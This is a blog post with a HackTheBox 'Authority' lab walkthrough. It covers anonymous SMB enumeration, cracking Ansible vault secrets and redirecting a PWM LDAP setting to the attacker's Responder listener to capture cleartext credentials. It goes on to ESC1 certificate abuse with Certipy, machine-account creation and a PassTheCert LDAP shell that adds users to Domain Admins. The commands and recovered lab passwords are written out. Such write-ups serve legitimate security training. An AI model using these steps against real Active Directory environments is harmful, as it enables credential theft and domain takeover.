<!DOCTYPE html>
<html lang="en-gb"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">HackTheBox Authority Write-Up | arth0s&#39; blog</title>
<meta property="og:title" content="HackTheBox Authority Write-Up | arth0s&#39; blog" />
<meta name="twitter:title" content="HackTheBox Authority Write-Up | arth0s&#39; blog" />
<meta itemprop="name" content="HackTheBox Authority Write-Up | arth0s&#39; blog" />
<meta name="application-name" content="HackTheBox Authority Write-Up | arth0s&#39; blog" />
<meta property="og:site_name" content="Awesome hugo blog" />

<meta name="description" content="Minimal Hugo blog theme with light and dark mode support">
<meta itemprop="description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta property="og:description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta name="twitter:description" content="Minimal Hugo blog theme with light and dark mode support" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="http://localhost:1313/posts/htb-authority/htb-authority/" title="English" />



  <meta itemprop="image" content="http://localhost:1313/" />
  <meta property="og:image" content="http://localhost:1313/" />
  <meta name="twitter:image" content="http://localhost:1313/" />
  <meta name="twitter:image:src" content="http://localhost:1313/" />




    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2023-12-09T14:40:33&#43;0300 />
    <meta property="article:published_time" content=2023-12-09T14:40:33&#43;0300 />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "HackTheBox Authority Write-Up",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2023-12-09",
        "description": "",
        "wordCount":  2350 ,
        "mainEntityOfPage": "True",
        "dateModified": "2023-12-09",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "arth0s\u0027 blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.124.1">

    

    <link rel="canonical" href="http://localhost:1313/posts/htb-authority/htb-authority/">
    <link href="/style.min.d43bc6c79baa87f006efb2b92be952faeedeb1a3ab626c1d6abda52eae049355.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="http://localhost:1313/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    </head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="http://localhost:1313/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/pages/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">HackTheBox Authority Write-Up</h1>
                
                
                <div class="post-meta">
                    <time datetime="2023-12-09T14:40:33&#43;03:00" itemprop="datePublished"> 9 Dec 2023 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#writeup">Writeup</a>
      <ul>
        <li><a href="#enumeration">Enumeration</a>
          <ul>
            <li><a href="#ansible-vault">Ansible vault</a></li>
            <li><a href="#web-services">Web services</a></li>
          </ul>
        </li>
        <li><a href="#user-flag">User flag</a>
          <ul>
            <li><a href="#alternative">Alternative</a></li>
          </ul>
        </li>
        <li><a href="#privilege-escalation--adcs">Privilege Escalation — ADCS</a>
          <ul>
            <li><a href="#troubleshooting">Troubleshooting</a></li>
            <li><a href="#passthecert">PassTheCert</a></li>
          </ul>
        </li>
        <li><a href="#root-flag">Root flag</a></li>
      </ul>
    </li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h1 id="authority">Authority</h1>
<h2 id="writeup">Writeup</h2>
<p><img src="Pasted%20image%2020231209160210.png"></p>
<h3 id="enumeration">Enumeration</h3>
<p>Authority is a medium HackTheBox machine that tests your ability to research technologies you may not have come across before and utilise documentation effectively to accomplish your goals. It also involves exploiting Active Directory Certificate Services for domain privilege escalation.</p>
<p>We&rsquo;ll begin with an Nmap scan to find out which ports are open and then perform a more detailed scan in order to obtain more information about them.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">nmap -Pn -p- --min-rate <span class="m">1000</span> -v 10.10.11.222 
</span></span><span class="line"><span class="cl">PORT      STATE SERVICE
</span></span><span class="line"><span class="cl">53/tcp    open  domain
</span></span><span class="line"><span class="cl">80/tcp    open  http
</span></span><span class="line"><span class="cl">88/tcp    open  kerberos-sec
</span></span><span class="line"><span class="cl">135/tcp   open  msrpc
</span></span><span class="line"><span class="cl">139/tcp   open  netbios-ssn
</span></span><span class="line"><span class="cl">389/tcp   open  ldap
</span></span><span class="line"><span class="cl">445/tcp   open  microsoft-ds
</span></span><span class="line"><span class="cl">464/tcp   open  kpasswd5
</span></span><span class="line"><span class="cl">593/tcp   open  http-rpc-epmap
</span></span><span class="line"><span class="cl">636/tcp   open  ldapssl
</span></span><span class="line"><span class="cl">5985/tcp  open  wsman
</span></span><span class="line"><span class="cl">8443/tcp  open  https-alt
</span></span><span class="line"><span class="cl">9389/tcp  open  adws
</span></span><span class="line"><span class="cl">47001/tcp open  winrm
</span></span></code></pre></div><p>Based on the open ports alone, we can already tell that we&rsquo;re dealing with Active Directory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">nmap -Pn -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389 -v 10.10.11.222
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209142331.png"></p>
<p>We&rsquo;re going to add the domain to our <code>/etc/hosts</code> file as usual.</p>
<p>What&rsquo;s more, our detailed scan reveals that there&rsquo;s a Certificate Authority configured, which means we also have Active Directory Certificate Services running. We can&rsquo;t do a lot with that information without having any credentials to work with, so we&rsquo;ll table that for later.</p>
<p>We have SMB running as expected for an Active Directory environment and two websites running on ports 80 and 8443.</p>
<p>We&rsquo;ll start by enumerating SMB as that can present us with low-hanging fruit if anonymous login happens to be enabled.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">smbclient -L <span class="se">\\\\</span>10.10.11.222<span class="se">\\</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">smbclient <span class="se">\\\\</span>10.10.11.222<span class="se">\\</span>Development -U anonymous
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">smbclient <span class="se">\\\\</span>10.10.11.222<span class="se">\\</span><span class="s2">&#34;Department Shares&#34;</span> -U anonymous
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209143240.png"></p>
<p>When listing the available shares with <code>smbclient</code>, we notice two non-default shares with could be of interest to us. If you try to connect to <code>Department Shares</code>, you will see that directory listing is denied.</p>
<p>The Development share looks especially interesting as it could contain sensitive information, so let&rsquo;s explore that avenue.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">smbclient <span class="se">\\\\</span>10.10.11.222<span class="se">\\</span>Development -U anonymous
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209143723.png"></p>
<p>If we hadn&rsquo;t noticed the Certificate Authority in our scans, the ADCS folder here would have been another clue.</p>
<p>We can also tell that Ansible has been utilised at some point for automation. This could mean that we might be able to recover or gain access to credentials that were utilised at some point during the automatic configuration.</p>
<p>Let&rsquo;s download everything so we can explore the files more easily on our machine.</p>
<p><img src="Pasted%20image%2020231209144153.png"></p>
<p>Exploring the files we acquired, we come across a file containing Tomcat users. We&rsquo;ll note these credentials down in case we have use for them later.</p>
<p><img src="Pasted%20image%2020231209144810.png"></p>
<p>I had not come across PWM before, so I researched what it is and found the project&rsquo;s <a href="https://github.com/pwm-project/pwm">GitHub</a> and from there the documentation page. PWM is a web-based configuration manager with over 500 configurable settings mainly tested and intended to work with Tomcat, which could explain the credentials we found.</p>
<p>There are a lot of <code>.yml</code> files to explore, which are files written in <a href="https://en.wikipedia.org/wiki/YAML">YAML</a> and used in playbooks - step-by-step configuration files used with Ansible to manage and automate configuration and application deployment.</p>
<h4 id="ansible-vault">Ansible vault</h4>
<p>The most interesting file for us is found under the <code>PWN/defaults</code> folder and contains what looks like encrypted login details.</p>
<p><img src="Pasted%20image%2020231209150030.png"></p>
<p>If something is encrypted, there must a way to decrypt it, which we can find by sifting through <a href="https://docs.ansible.com/ansible/latest/cli/ansible-vault.html#ansible-vault-decrypt">Ansible documentation</a>.</p>
<p><img src="Pasted%20image%2020231209150523.png"></p>
<p>Examining the <code>decrypt</code> command, we find out that it requires a &ldquo;vault secret&rdquo; which we currently do not have.</p>
<p><img src="Pasted%20image%2020231209151109.png"></p>
<p>Digging around, I found two ways to proceed. We can use <code>ansible2john</code> just as we would with any other <code>2john</code> tool. We can also use this <a href="https://www.onlinehashcrack.com/tools-ansible-vault-hash-extractor.php">online tool</a> which serves the exact same function. For that purpose, we&rsquo;d have to copy the blobs that start with <code>$ANSIBLE_VAULT</code> to separate files and convert them with our tool of choice one by one.</p>
<p>This leaves us with three separate hashes that we can then save in one file and proceed to crack with John.</p>
<p><img src="Pasted%20image%2020231209152532.png"></p>
<p>It turns out that all three result in the same password. Now we&rsquo;ve obtained the vault secret we need in order to decrypt the vault. We can go back to the three files with the vault blobs and decrypt them in order.</p>
<p>If you&rsquo;ve never used the command before, you&rsquo;ll be prompted to install the required package first.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">ansible-vault decrypt vault.blob1 --output decrypted.blob1 
</span></span><span class="line"><span class="cl">Vault password: 
</span></span><span class="line"><span class="cl">Decryption successful
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209153541.png"></p>
<p>The first blob gives us <code>svc_pwm</code> which seems to be a username. Blobs 2 and 3 result in what appears to be credentials, which we can correlate back with the <code>main.yml</code> file as being the <code>pwm_admin_password</code> and <code>ldap_admin_password</code>. We&rsquo;ll put everything down in our notes.</p>
<pre tabindex="0"><code>pwm_admin_login: svc_pwm

pwm_admin_password: pWm_@dm!N_!23

ldap_admin_password: DevT3st@123
</code></pre><p>We can also find this  in the file under the <code>ADCS/defaults</code> folder.</p>
<p><img src="Pasted%20image%2020231209154521.png"></p>
<p>The email and passphrase may be relevant later so we&rsquo;re going to note them down.</p>
<p>As we&rsquo;ll soon discover, not all the information we&rsquo;ve collected is going to be useful to us. Nevertheless, we need to be thorough in our enumeration.</p>
<h4 id="web-services">Web services</h4>
<p>After we&rsquo;ve exhausted everything we could obtain from the initial SMB anonymous access, we&rsquo;re going to move on to the websites we know are running. The website on port 80 only gives us the default Microsoft IIS ( Internet Information Services) page and trying to find directories or vhosts with <code>Gobuster</code> gives us no results.</p>
<p>We can move on to the website running on port 8443. We are greeted with this page when first accessing the website.</p>
<p><img src="Pasted%20image%2020231209160700.png"></p>
<p>The message below the login portal indicates that PWM has not been fully configured and is not secure. We can try to login with the user <code>svc_pwm</code> and the <code>pwm_admin_password</code> we obtained when decrypting the Ansible vault, but we get an error message.</p>
<p><img src="Pasted%20image%2020231209160950.png"></p>
<p>None of the other credentials we have collected work either.</p>
<p>If we try to access the Configuration Manager, we can see some details about previous authentications and we are asked to provide a password.</p>
<p><img src="Pasted%20image%2020231209161143.png"></p>
<p>This time, entering the <code>pwm_admin_password</code> lets us access the service.</p>
<p><img src="Pasted%20image%2020231209161325.png"></p>
<p>From the information available to us, we can see that there&rsquo;s another user - <code>svc_ldap</code>, and that the service is attempting and failing to connect to LDAPS on port 636.</p>
<p>Furthermore, we have the option to download the current configuration file and import a file of our own. This could prove very useful.</p>
<p><img src="Pasted%20image%2020231209161515.png"></p>
<h3 id="user-flag">User flag</h3>
<p>Let&rsquo;s download and examine the current configuration file. The first thing that piques our interest is a password hash at the very beginning of the file.</p>
<p><img src="Pasted%20image%2020231209161943.png"></p>
<p>We can identify the hash as <code>bcrypt</code>, hashcat mode 3200, but even when running Hashcat on our host machine, it will take upwards of 10 hours to go through <code>rockyou</code>, so we&rsquo;ll continue examining the file.</p>
<p>Further down, we&rsquo;ll find the configuration for the LDAPS server that the service is attempting to access.</p>
<p><img src="Pasted%20image%2020231209163749.png"></p>
<p>This is perfect. It means that we can edit the file and configure it to reach out to our own machine and potentially capture a hash or cleartext credentials with Responder.</p>
<p>We can either replace the value or add another line to it with our own IP. We must keep in mind that Responder cannot run an LDAPS server when making the edit, so our line would look like this:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl"><span class="nt">&lt;value&gt;</span>ldap://10.10.16.3:389<span class="nt">&lt;/value&gt;</span>
</span></span></code></pre></div><p>We can now start Responder on our attacking machine and hope the service will reach out to us.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">responder -I tun0 -dwv 
</span></span></code></pre></div><p>If you experience an error with Responder (<code>Error starting TCP server on port 389, check permissions or other servers running.</code>), you can use the following command to find what process is running on that port and then use its PID to kill it.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">sudo ss --tcp --udp --listen --numeric --process <span class="p">|</span> grep <span class="m">389</span>
</span></span></code></pre></div><p>With Responder running, we can now go back to import the configuration, which will restart the application.</p>
<p><img src="Pasted%20image%2020231209164212.png"></p>
<p>As soon as that&rsquo;s completed, we will receive cleartext credentials in Responder for the <code>svc_ldap</code> user.</p>
<p><img src="Pasted%20image%2020231209163459.png"></p>
<h4 id="alternative">Alternative</h4>
<p>Sometimes, there is more than one way to pwn a machine. We can accomplish the exact same thing by accessing the Configuration Editor instead and proceeding to add our own machine under the Connection menu.</p>
<p><img src="Pasted%20image%2020231209162931.png"></p>
<p>Once we&rsquo;ve made the addition we just need to click on &ldquo;Test LDAP Profile&rdquo; and we&rsquo;ll obtain the cleartext credentials in Responder once more.</p>
<p><img src="Pasted%20image%2020231209163415.png"></p>
<p>Having obtained valid credentials, we can now login with <code>evil-winrm</code>, as we found port 5985 to be open in our initial scans, and we can finally obtain the user flag.</p>
<p><img src="Pasted%20image%2020231209165331.png"></p>
<h3 id="privilege-escalation--adcs">Privilege Escalation — ADCS</h3>
<p>When we examine directories on the machine, we get yet another hint pointing towards ADCS.</p>
<p><img src="Pasted%20image%2020231209173005.png"></p>
<p>There&rsquo;s a singular certificate in the <code>Certs</code> directory, but there&rsquo;s not much we can do with it.</p>
<p>What we can do is proceed to enumerate the certificate templates available. Enumerating and exploiting ADCS has never been easier with a tool like <a href="https://github.com/ly4k/Certipy">Certipy</a>.</p>
<p>First we&rsquo;re going to utilise the tool with the <code>find</code> command and the credentials we&rsquo;ve obtained to enumerate templates.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">certipy find -u svc_ldap -p <span class="s1">&#39;&lt;password&gt;&#39;</span> -dc-ip 10.10.11.222
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209173450.png"></p>
<p>Using this command, we will obtain the output in three formats - a txt file, a JSON file and a zip file intended for Bloodhound.</p>
<p>We can add the <code>-text</code> and <code>-vulnerable</code> flags to the command, which will provide us with just a txt file containing only vulnerable templates.</p>
<p>The tool very helpfully provides us with the exact vulnerability, in this case ESC1, which we can then look up in the tool documentation on GitHub to learn how it can be abused, but I&rsquo;ve also highlighted the things to look out for if we were examining templates manually.</p>
<p><img src="Pasted%20image%2020231209174111.png"></p>
<p>Before we can proceed, however, we need to access to a Domain Computer account which we don&rsquo;t have. However, if Active Directory has been configured with default settings, we can add such an account ourselves.</p>
<p>To find out, we can check the MachineAccountQuota domain-level attribute. By default it is set to 10, allowing standard domain users to create machine (aka computer) accounts.</p>
<p>We can check this attribute with the <a href="https://www.jorgebernhardt.com/how-to-change-attribute-ms-ds-machineaccountquota/">following PowerShell command</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">Get-ADObject</span> <span class="n">-Identity</span> <span class="p">((</span><span class="nb">Get-ADDomain</span><span class="p">).</span><span class="n">distinguishedname</span><span class="p">)</span> <span class="n">-Properties</span> <span class="nb">ms-DS</span><span class="n">-MachineAccountQuota</span>
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209174643.png"></p>
<p>Perfect, the default settings have not been changed. Now we can utilise <code>addcomputer.py</code> from the <a href="https://tools.thehacker.recipes/impacket/examples/addcomputer.py">Impacket Suite</a> to add create a new computer account with a password of our choice.</p>
<p>We&rsquo;ll need to specify the DC IP, computer name and our chosen password.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">addcomputer.py -dc-ip 10.10.11.222 -computer-pass <span class="s1">&#39;Whatever13&#39;</span> -computer-name new_computer <span class="s1">&#39;authority.htb/svc_ldap:lDaP_1n_th3_cle4r!&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">addcomputer.py -dc-ip 10.10.11.222 -computer-pass <span class="s1">&#39;Whatever13&#39;</span> -computer-name new_computer <span class="s1">&#39;authority.htb/svc_ldap:&lt;password&gt;&#39;</span>
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209175419.png"></p>
<p>Now that we have a computer account, we can use it to request a template from the Certificate Authority. We need to specify credentials, the CA itself, the domain, the user principal name for the Administrator account so we can then authenticate as that account, and the DNS server, which we discovered previously when we saw what the PWM service was attempting to reach out to.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">certipy req -u <span class="s1">&#39;new_computer$&#39;</span> -p <span class="s1">&#39;Whatever13&#39;</span> -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn administrator@authority.htb -dns authority.authority.htb -dc-ip 10.10.11.222
</span></span></code></pre></div><p><img src="Pasted%20image%2020231209184626.png"></p>
<h4 id="troubleshooting">Troubleshooting</h4>
<p>Now, there are two errors you can get here when running this command.</p>
<pre tabindex="0"><code>[-] Got error: Unknown DCE RPC fault status code: 00000721

[-] Got error: The NETBIOS connection with the remote host timed out.
</code></pre><p>I don&rsquo;t believe this is intended, as I never encountered these errors the first time I did the box. Recommended solutions are changing the order of entries in your hosts file, or adding the domain and DC IP to your <code>/etc/resolv.conf</code> or through the network manager after which you have to restart the service with <code>sudo systemctl restart NetworkManager</code>. I am sure which one of these solves the problem, a combination of those plus restarting the machine and running the Certipy command finally took care of the issue for me.</p>
<h4 id="passthecert">PassTheCert</h4>
<p>Having obtained the administrator certificate, the next step would be to utilise it for authentication, thereby receiving the NTLM hash of the administrator with the following command:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">certipy auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222
</span></span></code></pre></div><p>This fails in our case with the following error which is indeed intended:</p>
<pre tabindex="0"><code>[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
</code></pre><p><img src="Pasted%20image%2020231209185149.png"></p>
<p>Googling the specific error leads us to <a href="https://github.com/ly4k/Certipy/issues/64">this issue on GitHub</a> and consequently to a tool called <a href="https://github.com/AlmondOffSec/PassTheCert/">PassTheCert</a>. We learn that the error means the KDC is not set up for Kerberos authentication and the Domain Controller does not support PKINIT. The PassTheCert tool allows us to bypass that by authentication via LDAP(S).</p>
<p>We can use the version of the tool written in Python. All we need to do is follow the <a href="https://github.com/AlmondOffSec/PassTheCert/tree/main/Python">instructions on GitHub to the letter</a>. We can run the following commands to extract the certificate and private key from the pfx file.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
</span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Writing certificate to <span class="s1">&#39;user.crt&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">certipy cert -pfx administrator_authority.pfx -nocert -out user.key
</span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Writing private key to <span class="s1">&#39;user.key&#39;</span>
</span></span></code></pre></div><p>Afterwards we can utilise those with the PassTheCert Python script to authenticate to the DC via LDAP.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
</span></span></code></pre></div><p>This will provide us with a fair number of commands we can run, most notably we can create a new user and add a user to a group.</p>
<p><img src="Pasted%20image%2020231209190320.png"></p>
<h3 id="root-flag">Root flag</h3>
<p>The simplest way to proceed is to add the <code>svc_ldap</code> user to the local Administrators group or to Domain Admins.</p>
<pre tabindex="0"><code>add_user_to_group svc_ldap Administrators
add_user_to_group svc_ldap &#34;Domain Admins&#34;
</code></pre><p><img src="Pasted%20image%2020231209190539.png"></p>
<p>The other route is to create our own user and then add that user to a group, which is the better route to take so we do not make any changes to existing users.</p>
<pre tabindex="0"><code>add_user arth0s
Attempting to create user in: %s CN=Users,DC=authority,DC=htb
Adding new user with username: arth0s and password: L|PcV[Ua)=%+M(W result: OK
</code></pre><p>The user we add will be assigned a random complex password, we&rsquo;re free to change that and add the user to one of the aforementioned groups.</p>
<pre tabindex="0"><code>change_password arth0s Whatever13
Got User DN: CN=arth0s,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Whatever13
Password changed successfully!
</code></pre><p>Voila! We are now able to log in with our newly created user and obtain the root flag.</p>
<p><img src="Pasted%20image%2020231209191000.png"></p>
<p>Thank you for reading and thank you to the creators of this box <a href="https://app.hackthebox.com/users/2984">mrb3n</a> and <a href="https://app.hackthebox.com/users/206770">Sentinal920</a>.</p>
<p>If you&rsquo;re interested in diving deeper into abusing ADCS for domain privilege escalation, read the documentation for Certipy, the the Certified Pre-Owned white paper by <a href="https://twitter.com/harmj0y">Will Schroeder</a> and <a href="https://twitter.com/tifkin">Lee Christensen</a>, and you&rsquo;re welcome to check out <a href="https://github.com/arth0sz/Practice-AD-CS-Domain-Escalation">my GitHub repo</a> dedicated to that as well.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/arth0sz" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2024
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script async src="http://localhost:1313/js/main.js" ></script>

    

</body>
</html>
